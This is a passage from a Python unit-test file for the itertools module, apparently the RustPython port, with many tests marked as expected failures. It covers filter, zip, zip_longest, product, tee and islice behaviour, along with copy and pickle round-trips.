# __eq__ failure on outer object
self.assertRaises(ExpectedError, gulp, s, func=id)
# __eq__ failure on inner object
self.assertRaises(ExpectedError, gulp, s)
# keyfunc failure
def keyfunc(obj):
if keyfunc.skip > 0:
keyfunc.skip -= 1
return obj
else:
raise ExpectedError
# keyfunc failure on outer object
keyfunc.skip = 0
self.assertRaises(ExpectedError, gulp, [None], keyfunc)
keyfunc.skip = 1
self.assertRaises(ExpectedError, gulp, [None, None], keyfunc)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_filter(self):
self.assertEqual(list(filter(isEven, range(6))), [0,2,4])
self.assertEqual(list(filter(None, [0,1,0,2,0])), [1,2])
self.assertEqual(list(filter(bool, [0,1,0,2,0])), [1,2])
self.assertEqual(take(4, filter(isEven, count())), [0,2,4,6])
self.assertRaises(TypeError, filter)
self.assertRaises(TypeError, filter, lambda x:x)
self.assertRaises(TypeError, filter, lambda x:x, range(6), 7)
self.assertRaises(TypeError, filter, isEven, 3)
self.assertRaises(TypeError, next, filter(range(6), range(6)))
# check copy, deepcopy, pickle
ans = [0,2,4]
c = filter(isEven, range(6))
self.assertEqual(list(copy.copy(c)), ans)
c = filter(isEven, range(6))
self.assertEqual(list(copy.deepcopy(c)), ans)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
c = filter(isEven, range(6))
self.assertEqual(list(pickle.loads(pickle.dumps(c, proto))), ans)
next(c)
self.assertEqual(list(pickle.loads(pickle.dumps(c, proto))), ans[1:])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
c = filter(isEven, range(6))
self.pickletest(proto, c)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_filterfalse(self):
self.assertEqual(list(filterfalse(isEven, range(6))), [1,3,5])
self.assertEqual(list(filterfalse(None, [0,1,0,2,0])), [0,0,0])
self.assertEqual(list(filterfalse(bool, [0,1,0,2,0])), [0,0,0])
self.assertEqual(take(4, filterfalse(isEven, count())), [1,3,5,7])
self.assertRaises(TypeError, filterfalse)
self.assertRaises(TypeError, filterfalse, lambda x:x)
self.assertRaises(TypeError, filterfalse, lambda x:x, range(6), 7)
self.assertRaises(TypeError, filterfalse, isEven, 3)
self.assertRaises(TypeError, next, filterfalse(range(6), range(6)))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, filterfalse(isEven, range(6)))
def test_zip(self):
# XXX This is rather silly now that builtin zip() calls zip()...
ans = [(x,y) for x, y in zip('abc',count())]
self.assertEqual(ans, [('a', 0), ('b', 1), ('c', 2)])
self.assertEqual(list(zip('abc', range(6))), lzip('abc', range(6)))
self.assertEqual(list(zip('abcdef', range(3))), lzip('abcdef', range(3)))
self.assertEqual(take(3,zip('abcdef', count())), lzip('abcdef', range(3)))
self.assertEqual(list(zip('abcdef')), lzip('abcdef'))
self.assertEqual(list(zip()), lzip())
self.assertRaises(TypeError, zip, 3)
self.assertRaises(TypeError, zip, range(3), 3)
self.assertEqual([tuple(list(pair)) for pair in zip('abc', 'def')],
lzip('abc', 'def'))
self.assertEqual([pair for pair in zip('abc', 'def')],
lzip('abc', 'def'))
@support.impl_detail("tuple reuse is specific to CPython")
def test_zip_tuple_reuse(self):
ids = list(map(id, zip('abc', 'def')))
self.assertEqual(min(ids), max(ids))
ids = list(map(id, list(zip('abc', 'def'))))
self.assertEqual(len(dict.fromkeys(ids)), len(ids))
# check copy, deepcopy, pickle
ans = [(x,y) for x, y in copy.copy(zip('abc',count()))]
self.assertEqual(ans, [('a', 0), ('b', 1), ('c', 2)])
ans = [(x,y) for x, y in copy.deepcopy(zip('abc',count()))]
self.assertEqual(ans, [('a', 0), ('b', 1), ('c', 2)])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
ans = [(x,y) for x, y in pickle.loads(pickle.dumps(zip('abc',count()), proto))]
self.assertEqual(ans, [('a', 0), ('b', 1), ('c', 2)])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
testIntermediate = zip('abc',count())
next(testIntermediate)
ans = [(x,y) for x, y in pickle.loads(pickle.dumps(testIntermediate, proto))]
self.assertEqual(ans, [('b', 1), ('c', 2)])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, zip('abc', count()))
def test_ziplongest(self):
for args in [
['abc', range(6)],
[range(6), 'abc'],
[range(1000), range(2000,2100), range(3000,3050)],
[range(1000), range(0), range(3000,3050), range(1200), range(1500)],
[range(1000), range(0), range(3000,3050), range(1200), range(1500), range(0)],
]:
target = [tuple([arg[i] if i < len(arg) else None for arg in args])
for i in range(max(map(len, args)))]
self.assertEqual(list(zip_longest(*args)), target)
self.assertEqual(list(zip_longest(*args, **{})), target)
target = [tuple((e is None and 'X' or e) for e in t) for t in target] # Replace None fills with 'X'
self.assertEqual(list(zip_longest(*args, **dict(fillvalue='X'))), target)
self.assertEqual(take(3,zip_longest('abcdef', count())), list(zip('abcdef', range(3)))) # take 3 from infinite input
self.assertEqual(list(zip_longest()), list(zip()))
self.assertEqual(list(zip_longest([])), list(zip([])))
self.assertEqual(list(zip_longest('abcdef')), list(zip('abcdef')))
self.assertEqual(list(zip_longest('abc', 'defg', **{})),
list(zip(list('abc')+[None], 'defg'))) # empty keyword dict
self.assertRaises(TypeError, zip_longest, 3)
self.assertRaises(TypeError, zip_longest, range(3), 3)
for stmt in [
"zip_longest('abc', fv=1)",
"zip_longest('abc', fillvalue=1, bogus_keyword=None)",
]:
try:
eval(stmt, globals(), locals())
except TypeError:
pass
else:
self.fail('Did not raise Type in: ' + stmt)
self.assertEqual([tuple(list(pair)) for pair in zip_longest('abc', 'def')],
list(zip('abc', 'def')))
self.assertEqual([pair for pair in zip_longest('abc', 'def')],
list(zip('abc', 'def')))
@support.impl_detail("tuple reuse is specific to CPython")
def test_zip_longest_tuple_reuse(self):
ids = list(map(id, zip_longest('abc', 'def')))
self.assertEqual(min(ids), max(ids))
ids = list(map(id, list(zip_longest('abc', 'def'))))
self.assertEqual(len(dict.fromkeys(ids)), len(ids))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_zip_longest_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, zip_longest("abc", "def"))
self.pickletest(proto, zip_longest("abc", "defgh"))
self.pickletest(proto, zip_longest("abc", "defgh", fillvalue=1))
self.pickletest(proto, zip_longest("", "defgh"))
def test_zip_longest_bad_iterable(self):
exception = TypeError()
class BadIterable:
def __iter__(self):
raise exception
with self.assertRaises(TypeError) as cm:
zip_longest(BadIterable())
self.assertIs(cm.exception, exception)
def test_bug_7244(self):
class Repeater:
# this class is similar to itertools.repeat
def __init__(self, o, t, e):
self.o = o
self.t = int(t)
self.e = e
def __iter__(self): # its iterator is itself
return self
def __next__(self):
if self.t > 0:
self.t -= 1
return self.o
else:
raise self.e
# Formerly this code in would fail in debug mode
# with Undetected Error and Stop Iteration
r1 = Repeater(1, 3, StopIteration)
r2 = Repeater(2, 4, StopIteration)
def run(r1, r2):
result = []
for i, j in zip_longest(r1, r2, fillvalue=0):
with support.captured_output('stdout'):
print((i, j))
result.append((i, j))
return result
self.assertEqual(run(r1, r2), [(1,2), (1,2), (1,2), (0,2)])
# Formerly, the RuntimeError would be lost
# and StopIteration would stop as expected
r1 = Repeater(1, 3, RuntimeError)
r2 = Repeater(2, 4, StopIteration)
it = zip_longest(r1, r2, fillvalue=0)
self.assertEqual(next(it), (1, 2))
self.assertEqual(next(it), (1, 2))
self.assertEqual(next(it), (1, 2))
self.assertRaises(RuntimeError, next, it)
def test_pairwise(self):
self.assertEqual(list(pairwise('')), [])
self.assertEqual(list(pairwise('a')), [])
self.assertEqual(list(pairwise('ab')),
[('a', 'b')]),
self.assertEqual(list(pairwise('abcde')),
[('a', 'b'), ('b', 'c'), ('c', 'd'), ('d', 'e')])
self.assertEqual(list(pairwise(range(10_000))),
list(zip(range(10_000), range(1, 10_000))))
with self.assertRaises(TypeError):
pairwise() # too few arguments
with self.assertRaises(TypeError):
pairwise('abc', 10) # too many arguments
with self.assertRaises(TypeError):
pairwise(iterable='abc') # keyword arguments
with self.assertRaises(TypeError):
pairwise(None) # non-iterable argument
def test_product(self):
for args, result in [
([], [()]), # zero iterables
(['ab'], [('a',), ('b',)]), # one iterable
([range(2), range(3)], [(0,0), (0,1), (0,2), (1,0), (1,1), (1,2)]), # two iterables
([range(0), range(2), range(3)], []), # first iterable with zero length
([range(2), range(0), range(3)], []), # middle iterable with zero length
([range(2), range(3), range(0)], []), # last iterable with zero length
]:
self.assertEqual(list(product(*args)), result)
for r in range(4):
self.assertEqual(list(product(*(args*r))),
list(product(*args, **dict(repeat=r))))
self.assertEqual(len(list(product(*[range(7)]*6))), 7**6)
self.assertRaises(TypeError, product, range(6), None)
def product1(*args, **kwds):
pools = list(map(tuple, args)) * kwds.get('repeat', 1)
n = len(pools)
if n == 0:
yield ()
return
if any(len(pool) == 0 for pool in pools):
return
indices = [0] * n
yield tuple(pool[i] for pool, i in zip(pools, indices))
while 1:
for i in reversed(range(n)): # right to left
if indices[i] == len(pools[i]) - 1:
continue
indices[i] += 1
for j in range(i+1, n):
indices[j] = 0
yield tuple(pool[i] for pool, i in zip(pools, indices))
break
else:
return
def product2(*args, **kwds):
'Pure python version used in docs'
pools = list(map(tuple, args)) * kwds.get('repeat', 1)
result = [[]]
for pool in pools:
result = [x+[y] for x in result for y in pool]
for prod in result:
yield tuple(prod)
argtypes = ['', 'abc', '', range(0), range(4), dict(a=1, b=2, c=3),
set('abcdefg'), range(11), tuple(range(13))]
for i in range(100):
args = [random.choice(argtypes) for j in range(random.randrange(5))]
expected_len = prod(map(len, args))
self.assertEqual(len(list(product(*args))), expected_len)
self.assertEqual(list(product(*args)), list(product1(*args)))
self.assertEqual(list(product(*args)), list(product2(*args)))
args = map(iter, args)
self.assertEqual(len(list(product(*args))), expected_len)
@support.bigaddrspacetest
def test_product_overflow(self):
with self.assertRaises((OverflowError, MemoryError)):
product(*(['ab']*2**5), repeat=2**25)
@support.impl_detail("tuple reuse is specific to CPython")
def test_product_tuple_reuse(self):
self.assertEqual(len(set(map(id, product('abc', 'def')))), 1)
self.assertNotEqual(len(set(map(id, list(product('abc', 'def'))))), 1)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_product_pickling(self):
# check copy, deepcopy, pickle
for args, result in [
([], [()]), # zero iterables
(['ab'], [('a',), ('b',)]), # one iterable
([range(2), range(3)], [(0,0), (0,1), (0,2), (1,0), (1,1), (1,2)]), # two iterables
([range(0), range(2), range(3)], []), # first iterable with zero length
([range(2), range(0), range(3)], []), # middle iterable with zero length
([range(2), range(3), range(0)], []), # last iterable with zero length
]:
self.assertEqual(list(copy.copy(product(*args))), result)
self.assertEqual(list(copy.deepcopy(product(*args))), result)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, product(*args))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_product_issue_25021(self):
# test that indices are properly clamped to the length of the tuples
p = product((1, 2),(3,))
p.__setstate__((0, 0x1000)) # will access tuple element 1 if not clamped
self.assertEqual(next(p), (2, 3))
# test that empty tuple in the list will result in an immediate StopIteration
p = product((1, 2), (), (3,))
p.__setstate__((0, 0, 0x1000)) # will access tuple element 1 if not clamped
self.assertRaises(StopIteration, next, p)
def test_repeat(self):
self.assertEqual(list(repeat(object='a', times=3)), ['a', 'a', 'a'])
self.assertEqual(lzip(range(3),repeat('a')),
[(0, 'a'), (1, 'a'), (2, 'a')])
self.assertEqual(list(repeat('a', 3)), ['a', 'a', 'a'])
self.assertEqual(take(3, repeat('a')), ['a', 'a', 'a'])
self.assertEqual(list(repeat('a', 0)), [])
self.assertEqual(list(repeat('a', -3)), [])
self.assertRaises(TypeError, repeat)
self.assertRaises(TypeError, repeat, None, 3, 4)
self.assertRaises(TypeError, repeat, None, 'a')
r = repeat(1+0j)
self.assertEqual(repr(r), 'repeat((1+0j))')
r = repeat(1+0j, 5)
self.assertEqual(repr(r), 'repeat((1+0j), 5)')
list(r)
self.assertEqual(repr(r), 'repeat((1+0j), 0)')
# check copy, deepcopy, pickle
c = repeat(object='a', times=10)
self.assertEqual(next(c), 'a')
self.assertEqual(take(2, copy.copy(c)), list('a' * 2))
self.assertEqual(take(2, copy.deepcopy(c)), list('a' * 2))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, repeat(object='a', times=10))
def test_repeat_with_negative_times(self):
self.assertEqual(repr(repeat('a', -1)), "repeat('a', 0)")
self.assertEqual(repr(repeat('a', -2)), "repeat('a', 0)")
self.assertEqual(repr(repeat('a', times=-1)), "repeat('a', 0)")
self.assertEqual(repr(repeat('a', times=-2)), "repeat('a', 0)")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_map(self):
self.assertEqual(list(map(operator.pow, range(3), range(1,7))),
[0**1, 1**2, 2**3])
self.assertEqual(list(map(tupleize, 'abc', range(5))),
[('a',0),('b',1),('c',2)])
self.assertEqual(list(map(tupleize, 'abc', count())),
[('a',0),('b',1),('c',2)])
self.assertEqual(take(2,map(tupleize, 'abc', count())),
[('a',0),('b',1)])
self.assertEqual(list(map(operator.pow, [])), [])
self.assertRaises(TypeError, map)
self.assertRaises(TypeError, list, map(None, range(3), range(3)))
self.assertRaises(TypeError, map, operator.neg)
self.assertRaises(TypeError, next, map(10, range(5)))
self.assertRaises(ValueError, next, map(errfunc, [4], [5]))
self.assertRaises(TypeError, next, map(onearg, [4], [5]))
# check copy, deepcopy, pickle
ans = [('a',0),('b',1),('c',2)]
c = map(tupleize, 'abc', count())
self.assertEqual(list(copy.copy(c)), ans)
c = map(tupleize, 'abc', count())
self.assertEqual(list(copy.deepcopy(c)), ans)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
c = map(tupleize, 'abc', count())
self.pickletest(proto, c)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_starmap(self):
self.assertEqual(list(starmap(operator.pow, zip(range(3), range(1,7)))),
[0**1, 1**2, 2**3])
self.assertEqual(take(3, starmap(operator.pow, zip(count(), count(1)))),
[0**1, 1**2, 2**3])
self.assertEqual(list(starmap(operator.pow, [])), [])
self.assertEqual(list(starmap(operator.pow, [iter([4,5])])), [4**5])
self.assertRaises(TypeError, list, starmap(operator.pow, [None]))
self.assertRaises(TypeError, starmap)
self.assertRaises(TypeError, starmap, operator.pow, [(4,5)], 'extra')
self.assertRaises(TypeError, next, starmap(10, [(4,5)]))
self.assertRaises(ValueError, next, starmap(errfunc, [(4,5)]))
self.assertRaises(TypeError, next, starmap(onearg, [(4,5)]))
# check copy, deepcopy, pickle
ans = [0**1, 1**2, 2**3]
c = starmap(operator.pow, zip(range(3), range(1,7)))
self.assertEqual(list(copy.copy(c)), ans)
c = starmap(operator.pow, zip(range(3), range(1,7)))
self.assertEqual(list(copy.deepcopy(c)), ans)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
c = starmap(operator.pow, zip(range(3), range(1,7)))
self.pickletest(proto, c)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_islice(self):
for args in [ # islice(args) should agree with range(args)
(10, 20, 3),
(10, 3, 20),
(10, 20),
(10, 10),
(10, 3),
(20,)
]:
self.assertEqual(list(islice(range(100), *args)),
list(range(*args)))
for args, tgtargs in [ # Stop when seqn is exhausted
((10, 110, 3), ((10, 100, 3))),
((10, 110), ((10, 100))),
((110,), (100,))
]:
self.assertEqual(list(islice(range(100), *args)),
list(range(*tgtargs)))
# Test stop=None
self.assertEqual(list(islice(range(10), None)), list(range(10)))
self.assertEqual(list(islice(range(10), None, None)), list(range(10)))
self.assertEqual(list(islice(range(10), None, None, None)), list(range(10)))
self.assertEqual(list(islice(range(10), 2, None)), list(range(2, 10)))
self.assertEqual(list(islice(range(10), 1, None, 2)), list(range(1, 10, 2)))
# Test number of items consumed SF #1171417
it = iter(range(10))
self.assertEqual(list(islice(it, 3)), list(range(3)))
self.assertEqual(list(it), list(range(3, 10)))
it = iter(range(10))
self.assertEqual(list(islice(it, 3, 3)), [])
self.assertEqual(list(it), list(range(3, 10)))
# Test invalid arguments
ra = range(10)
self.assertRaises(TypeError, islice, ra)
self.assertRaises(TypeError, islice, ra, 1, 2, 3, 4)
self.assertRaises(ValueError, islice, ra, -5, 10, 1)
self.assertRaises(ValueError, islice, ra, 1, -5, -1)
self.assertRaises(ValueError, islice, ra, 1, 10, -1)
self.assertRaises(ValueError, islice, ra, 1, 10, 0)
self.assertRaises(ValueError, islice, ra, 'a')
self.assertRaises(ValueError, islice, ra, 'a', 1)
self.assertRaises(ValueError, islice, ra, 1, 'a')
self.assertRaises(ValueError, islice, ra, 'a', 1, 1)
self.assertRaises(ValueError, islice, ra, 1, 'a', 1)
self.assertEqual(len(list(islice(count(), 1, 10, maxsize))), 1)
# Issue #10323: Less islice in a predictable state
c = count()
self.assertEqual(list(islice(c, 1, 3, 50)), [1])
self.assertEqual(next(c), 3)
# check copy, deepcopy, pickle
for args in [ # islice(args) should agree with range(args)
(10, 20, 3),
(10, 3, 20),
(10, 20),
(10, 3),
(20,)
]:
self.assertEqual(list(copy.copy(islice(range(100), *args))),
list(range(*args)))
self.assertEqual(list(copy.deepcopy(islice(range(100), *args))),
list(range(*args)))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, islice(range(100), *args))
# Issue #21321: check source iterator is not referenced
# from islice() after the latter has been exhausted
it = (x for x in (1, 2))
wr = weakref.ref(it)
it = islice(it, 1)
self.assertIsNotNone(wr())
list(it) # exhaust the iterator
support.gc_collect()
self.assertIsNone(wr())
# Issue #30537: islice can accept integer-like objects as
# arguments
class IntLike(object):
def __init__(self, val):
self.val = val
def __index__(self):
return self.val
self.assertEqual(list(islice(range(100), IntLike(10))), list(range(10)))
self.assertEqual(list(islice(range(100), IntLike(10), IntLike(50))),
list(range(10, 50)))
self.assertEqual(list(islice(range(100), IntLike(10), IntLike(50), IntLike(5))),
list(range(10,50,5)))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_takewhile(self):
data = [1, 3, 5, 20, 2, 4, 6, 8]
self.assertEqual(list(takewhile(underten, data)), [1, 3, 5])
self.assertEqual(list(takewhile(underten, [])), [])
self.assertRaises(TypeError, takewhile)
self.assertRaises(TypeError, takewhile, operator.pow)
self.assertRaises(TypeError, takewhile, operator.pow, [(4,5)], 'extra')
self.assertRaises(TypeError, next, takewhile(10, [(4,5)]))
self.assertRaises(ValueError, next, takewhile(errfunc, [(4,5)]))
t = takewhile(bool, [1, 1, 1, 0, 0, 0])
self.assertEqual(list(t), [1, 1, 1])
self.assertRaises(StopIteration, next, t)
# check copy, deepcopy, pickle
self.assertEqual(list(copy.copy(takewhile(underten, data))), [1, 3, 5])
self.assertEqual(list(copy.deepcopy(takewhile(underten, data))),
[1, 3, 5])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, takewhile(underten, data))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_dropwhile(self):
data = [1, 3, 5, 20, 2, 4, 6, 8]
self.assertEqual(list(dropwhile(underten, data)), [20, 2, 4, 6, 8])
self.assertEqual(list(dropwhile(underten, [])), [])
self.assertRaises(TypeError, dropwhile)
self.assertRaises(TypeError, dropwhile, operator.pow)
self.assertRaises(TypeError, dropwhile, operator.pow, [(4,5)], 'extra')
self.assertRaises(TypeError, next, dropwhile(10, [(4,5)]))
self.assertRaises(ValueError, next, dropwhile(errfunc, [(4,5)]))
# check copy, deepcopy, pickle
self.assertEqual(list(copy.copy(dropwhile(underten, data))), [20, 2, 4, 6, 8])
self.assertEqual(list(copy.deepcopy(dropwhile(underten, data))),
[20, 2, 4, 6, 8])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, dropwhile(underten, data))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_tee(self):
n = 200
a, b = tee([]) # test empty iterator
self.assertEqual(list(a), [])
self.assertEqual(list(b), [])
a, b = tee(irange(n)) # test 100% interleaved
self.assertEqual(lzip(a,b), lzip(range(n), range(n)))
a, b = tee(irange(n)) # test 0% interleaved
self.assertEqual(list(a), list(range(n)))
self.assertEqual(list(b), list(range(n)))
a, b = tee(irange(n)) # test dealloc of leading iterator
for i in range(100):
self.assertEqual(next(a), i)
del a
self.assertEqual(list(b), list(range(n)))
a, b = tee(irange(n)) # test dealloc of trailing iterator
for i in range(100):
self.assertEqual(next(a), i)
del b
self.assertEqual(list(a), list(range(100, n)))
for j in range(5): # test randomly interleaved
order = [0]*n + [1]*n
random.shuffle(order)
lists = ([], [])
its = tee(irange(n))
for i in order:
value = next(its[i])
lists[i].append(value)
self.assertEqual(lists[0], list(range(n)))
self.assertEqual(lists[1], list(range(n)))
# test argument format checking
self.assertRaises(TypeError, tee)
self.assertRaises(TypeError, tee, 3)
self.assertRaises(TypeError, tee, [1,2], 'x')
self.assertRaises(TypeError, tee, [1,2], 3, 'x')
# tee object should be instantiable
a, b = tee('abc')
c = type(a)('def')
self.assertEqual(list(c), list('def'))
# test long-lagged and multi-way split
a, b, c = tee(range(2000), 3)
for i in range(100):
self.assertEqual(next(a), i)
self.assertEqual(list(b), list(range(2000)))
self.assertEqual([next(c), next(c)], list(range(2)))
self.assertEqual(list(a), list(range(100,2000)))
self.assertEqual(list(c), list(range(2,2000)))
# test values of n
self.assertRaises(TypeError, tee, 'abc', 'invalid')
self.assertRaises(ValueError, tee, [], -1)
for n in range(5):
result = tee('abc', n)
self.assertEqual(type(result), tuple)
self.assertEqual(len(result), n)
self.assertEqual([list(x) for x in result], [list('abc')]*n)
# tee pass-through to copyable iterator
a, b = tee('abc')
c, d = tee(a)
self.assertTrue(a is c)
# test tee_new
t1, t2 = tee('abc')
tnew = type(t1)
self.assertRaises(TypeError, tnew)
self.assertRaises(TypeError, tnew, 10)
t3 = tnew(t1)
self.assertTrue(list(t1) == list(t2) == list(t3) == list('abc'))
# test that tee objects are weak referencable
a, b = tee(range(10))
p = weakref.proxy(a)
self.assertEqual(getattr(p, '__class__'), type(b))
del a
self.assertRaises(ReferenceError, getattr, p, '__class__')
ans = list('abc')
long_ans = list(range(10000))
# check copy
a, b = tee('abc')
self.assertEqual(list(copy.copy(a)), ans)
self.assertEqual(list(copy.copy(b)), ans)
a, b = tee(list(range(10000)))
self.assertEqual(list(copy.copy(a)), long_ans)
self.assertEqual(list(copy.copy(b)), long_ans)
# check partially consumed copy
a, b = tee('abc')
take(2, a)
take(1, b)
self.assertEqual(list(copy.copy(a)), ans[2:])
self.assertEqual(list(copy.copy(b)), ans[1:])
self.assertEqual(list(a), ans[2:])
self.assertEqual(list(b), ans[1:])
a, b = tee(range(10000))
take(100, a)
take(60, b)
self.assertEqual(list(copy.copy(a)), long_ans[100:])
self.assertEqual(list(copy.copy(b)), long_ans[60:])
self.assertEqual(list(a), long_ans[100:])
self.assertEqual(list(b), long_ans[60:])
# check deepcopy
a, b = tee('abc')
self.assertEqual(list(copy.deepcopy(a)), ans)
self.assertEqual(list(copy.deepcopy(b)), ans)
self.assertEqual(list(a), ans)
self.assertEqual(list(b), ans)
a, b = tee(range(10000))
self.assertEqual(list(copy.deepcopy(a)), long_ans)
self.assertEqual(list(copy.deepcopy(b)), long_ans)
self.assertEqual(list(a), long_ans)
self.assertEqual(list(b), long_ans)
# check partially consumed deepcopy
a, b = tee('abc')
take(2, a)
take(1, b)
self.assertEqual(list(copy.deepcopy(a)), ans[2:])
self.assertEqual(list(copy.deepcopy(b)), ans[1:])
self.assertEqual(list(a), ans[2:])
self.assertEqual(list(b), ans[1:])
a, b = tee(range(10000))
take(100, a)
take(60, b)
self.assertEqual(list(copy.deepcopy(a)), long_ans[100:])
self.assertEqual(list(copy.deepcopy(b)), long_ans[60:])
self.assertEqual(list(a), long_ans[100:])
self.assertEqual(list(b), long_ans[60:])
# check pickle
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, iter(tee('abc')))
a, b = tee('abc')
self.pickletest(proto, a, compare=ans)
self.pickletest(proto, b, compare=ans)
# Issue 13454: Crash when deleting backward iterator from tee()
def test_tee_del_backward(self):
forward, backward = tee(repeat(None, 20000000))
try:
any(forward) # exhaust the iterator
del backward
except:
del forward, backward
raise
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_tee_reenter(self):
class I:
first = True
def __iter__(self):
return self
def __next__(self):
first = self.first
self.first = False
if first:
return next(b)
a, b = tee(I())
with self.assertRaisesRegex(RuntimeError, "tee"):
next(a)
@unittest.skip("TODO: RUSTPYTHON, hangs")
def test_tee_concurrent(self):
start = threading.Event()
finish = threading.Event()
class I:
def __iter__(self):
return self
def __next__(self):
start.set()
finish.wait()
a, b = tee(I())
thread = threading.Thread(target=next, args=[a])
thread.start()
try:
start.wait()
with self.assertRaisesRegex(RuntimeError, "tee"):
next(b)
finally:
finish.set()
thread.join()
def test_StopIteration(self):
self.assertRaises(StopIteration, next, zip())
for f in (chain, cycle, zip, groupby):
self.assertRaises(StopIteration, next, f([]))
self.assertRaises(StopIteration, next, f(StopNow()))
self.assertRaises(StopIteration, next, islice([], None))
self.assertRaises(StopIteration, next, islice(StopNow(), None))
p, q = tee([])
self.assertRaises(StopIteration, next, p)
self.assertRaises(StopIteration, next, q)
p, q = tee(StopNow())
self.assertRaises(StopIteration, next, p)
self.assertRaises(StopIteration, next, q)
self.assertRaises(StopIteration, next, repeat(None, 0))
for f in (filter, filterfalse, map, takewhile, dropwhile, starmap):
self.assertRaises(StopIteration, next, f(lambda x:x, []))
self.assertRaises(StopIteration, next, f(lambda x:x, StopNow()))
@support.cpython_only
def test_combinations_result_gc(self):
# bpo-42536: combinations's tuple-reuse speed trick breaks the GC's
# assumptions about what can be untracked. Make sure we re-track result
# tuples whenever we reuse them.
it = combinations([None, []], 1)
next(it)
gc.collect()
# That GC collection probably untracked the recycled internal result
# tuple, which has the value (None,). Make sure it's re-tracked when
# it's mutated and returned from __next__:
self.assertTrue(gc.is_tracked(next(it)))
@support.cpython_only
def test_combinations_with_replacement_result_gc(self):
# Ditto for combinations_with_replacement.
it = combinations_with_replacement([None, []], 1)
next(it)
gc.collect()
self.assertTrue(gc.is_tracked(next(it)))
@support.cpython_only
def test_permutations_result_gc(self):
# Ditto for permutations.
it = permutations([None, []], 1)
next(it)
gc.collect()
self.assertTrue(gc.is_tracked(next(it)))
@support.cpython_only
def test_product_result_gc(self):
# Ditto for product.
it = product([None, []])
next(it)
gc.collect()
self.assertTrue(gc.is_tracked(next(it)))
@support.cpython_only
def test_zip_longest_result_gc(self):
# Ditto for zip_longest.
it = zip_longest([[]])
gc.collect()
self.assertTrue(gc.is_tracked(next(it)))
class TestExamples(unittest.TestCase):
def test_accumulate(self):
self.assertEqual(list(accumulate([1,2,3,4,5])), [1, 3, 6, 10, 15])
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_accumulate_reducible(self):
# check copy, deepcopy, pickle
data = [1, 2, 3, 4, 5]
accumulated = [1, 3, 6, 10, 15]
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
it = accumulate(data)
self.assertEqual(list(pickle.loads(pickle.dumps(it, proto))), accumulated[:])
self.assertEqual(next(it), 1)
self.assertEqual(list(pickle.loads(pickle.dumps(it, proto))), accumulated[1:])
it = accumulate(data)
self.assertEqual(next(it), 1)
self.assertEqual(list(copy.deepcopy(it)), accumulated[1:])
self.assertEqual(list(copy.copy(it)), accumulated[1:])
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_accumulate_reducible_none(self):
# Issue #25718: total is None
it = accumulate([None, None, None], operator.is_)
self.assertEqual(next(it), None)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
it_copy = pickle.loads(pickle.dumps(it, proto))
self.assertEqual(list(it_copy), [True, False])
self.assertEqual(list(copy.deepcopy(it)), [True, False])
self.assertEqual(list(copy.copy(it)), [True, False])
def test_chain(self):
self.assertEqual(''.join(chain('ABC', 'DEF')), 'ABCDEF')
def test_chain_from_iterable(self):
self.assertEqual(''.join(chain.from_iterable(['ABC', 'DEF'])), 'ABCDEF')
def test_combinations(self):
self.assertEqual(list(combinations('ABCD', 2)),
[('A','B'), ('A','C'), ('A','D'), ('B','C'), ('B','D'), ('C','D')])
self.assertEqual(list(combinations(range(4), 3)),
[(0,1,2), (0,1,3), (0,2,3), (1,2,3)])
def test_combinations_with_replacement(self):
self.assertEqual(list(combinations_with_replacement('ABC', 2)),
[('A','A'), ('A','B'), ('A','C'), ('B','B'), ('B','C'), ('C','C')])
def test_compress(self):
self.assertEqual(list(compress('ABCDEF', [1,0,1,0,1,1])), list('ACEF'))
def test_count(self):
self.assertEqual(list(islice(count(10), 5)), [10, 11, 12, 13, 14])
def test_cycle(self):
self.assertEqual(list(islice(cycle('ABCD'), 12)), list('ABCDABCDABCD'))
def test_dropwhile(self):
self.assertEqual(list(dropwhile(lambda x: x<5, [1,4,6,4,1])), [6,4,1])
def test_groupby(self):
self.assertEqual([k for k, g in groupby('AAAABBBCCDAABBB')],
list('ABCDAB'))
self.assertEqual([(list(g)) for k, g in groupby('AAAABBBCCD')],
[list('AAAA'), list('BBB'), list('CC'), list('D')])
def test_filter(self):
self.assertEqual(list(filter(lambda x: x%2, range(10))), [1,3,5,7,9])
def test_filterfalse(self):
self.assertEqual(list(filterfalse(lambda x: x%2, range(10))), [0,2,4,6,8])
def test_map(self):
self.assertEqual(list(map(pow, (2,3,10), (5,2,3))), [32, 9, 1000])
def test_islice(self):
self.assertEqual(list(islice('ABCDEFG', 2)), list('AB'))
self.assertEqual(list(islice('ABCDEFG', 2, 4)), list('CD'))
self.assertEqual(list(islice('ABCDEFG', 2, None)), list('CDEFG'))
self.assertEqual(list(islice('ABCDEFG', 0, None, 2)), list('ACEG'))
def test_zip(self):
